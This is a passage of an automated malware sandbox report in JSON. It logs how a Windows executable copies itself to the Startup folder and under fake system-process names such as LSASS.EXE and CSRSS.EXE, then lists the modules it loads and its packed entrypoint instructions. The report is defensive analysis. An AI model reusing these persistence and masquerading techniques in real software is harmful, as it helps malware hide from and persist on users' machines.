C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location C:\\4k51k4.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.scr to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.scr to new location C:\\4k51k4.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005064)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"KERNEL32\" at base 76540000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"USER32\" at base 77100000\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d30000\n \"4k51k4.exe\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"4k51k4.exe\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"4k51k4.exe\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"4k51k4.exe\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"4k51k4.exe\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"4k51k4.exe\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"4k51k4.exe\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"4k51k4.exe\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"4k51k4.exe\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"4k51k4.exe\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"4k51k4.exe\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"4k51k4.exe\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"4k51k4.exe\" loaded module \"USER32\" at base 77100000\n \"4k51k4.exe\" loaded module \"KERNEL32\" at base 76540000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76540000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"IExplorer.exe\" loaded module \"USER32\" at base 77100000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74070000\n \"4k51k4.exe\" loaded module \"SXS.DLL\" at base 754a0000\n \"4k51k4.exe\" loaded module \"CRYPTSP.DLL\" at base 74fa0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74070000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 754a0000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74fa0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d30000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76540000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74070000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 754a0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74fa0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d30000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 77100000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76540000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74fa0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d30000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 77100000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74070000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 754a0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76540000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74fa0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d30000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 77100000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 754a0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76540000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d30000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"LSASS.EXE\" loaded module \"USER32\" at base 77100000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74070000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76540000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b170000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 775f0000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 754a0000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74fa0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74d30000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77050000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75490000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73c60000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76540000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 758f0000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 76ef0000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74460000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77850000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76540000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76700000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76620000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74a00000\n \"SMSS.EXE\" loaded module \"USER32\" at base 77100000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75440000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74070000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74070000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 754a0000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74fa0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc20000\n \"LSASS.EXE\" loaded module \"DWMAPI.DLL\" at base 73c60000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4k51k4.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C450.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C452.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrHelloween.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C88D.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C740.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C743.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, 